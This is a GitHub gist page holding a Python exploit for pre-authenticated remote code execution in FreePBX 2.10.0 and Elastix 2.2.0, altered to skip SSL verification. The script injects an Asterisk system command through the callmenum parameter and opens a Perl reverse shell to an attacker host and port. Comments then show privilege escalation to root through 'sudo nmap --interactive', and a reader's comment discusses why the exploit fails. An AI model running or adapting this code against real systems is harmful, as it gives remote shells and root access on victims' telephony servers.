Created
June 2, 2018 11:31
-
-
Save thel3l/a78c08272781130317d0bc73d1881d28 to your computer and use it in GitHub Desktop.
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution - Fixed to avoid SSL errors.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
############################################################ | |
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit | |
# Google Dork: oy vey | |
# Date: March 23rd, 2012 | |
# Author: muts | |
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others. | |
# Tested on: multiple | |
# CVE : notyet | |
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ | |
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt | |
############################################################ | |
# Discovered by Martin Tschirsich | |
# http://seclists.org/fulldisclosure/2012/Mar/234 | |
# http://www.exploit-db.com/exploits/18649 | |
############################################################# | |
#import urllib | |
rhost="172.16.254.72" | |
lhost="172.16.254.223" | |
lport=4443 | |
extension="1000" | |
import urllib2 | |
import ssl | |
ctx = ssl.create_default_context() | |
ctx.check_hostname = False | |
ctx.verify_mode = ssl.CERT_NONE | |
# Reverse shell payload | |
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A' | |
urllib2.urlopen(url, context=ctx) | |
# On Elastix, once we have a shell, we can escalate to root: | |
# root@bt:~# nc -lvp 443 | |
# listening on [any] 443 ... | |
# connect to [172.16.254.223] from voip [172.16.254.72] 43415 | |
# id | |
# uid=100(asterisk) gid=101(asterisk) | |
# sudo nmap --interactive | |
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) | |
# Welcome to Interactive Mode -- press h <enter> for help | |
# nmap> !sh | |
# id | |
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanks for the reply. But you're wrong.
urllib2.urlopen(url, context=ctx)
is correct. Theextension="1000"
is the problem here.Check this https://github.com/A1vinSmith/FreePBX-2.10.0---Elastix-2.2.0---Remote-Code-Execution/blob/master/exploit.py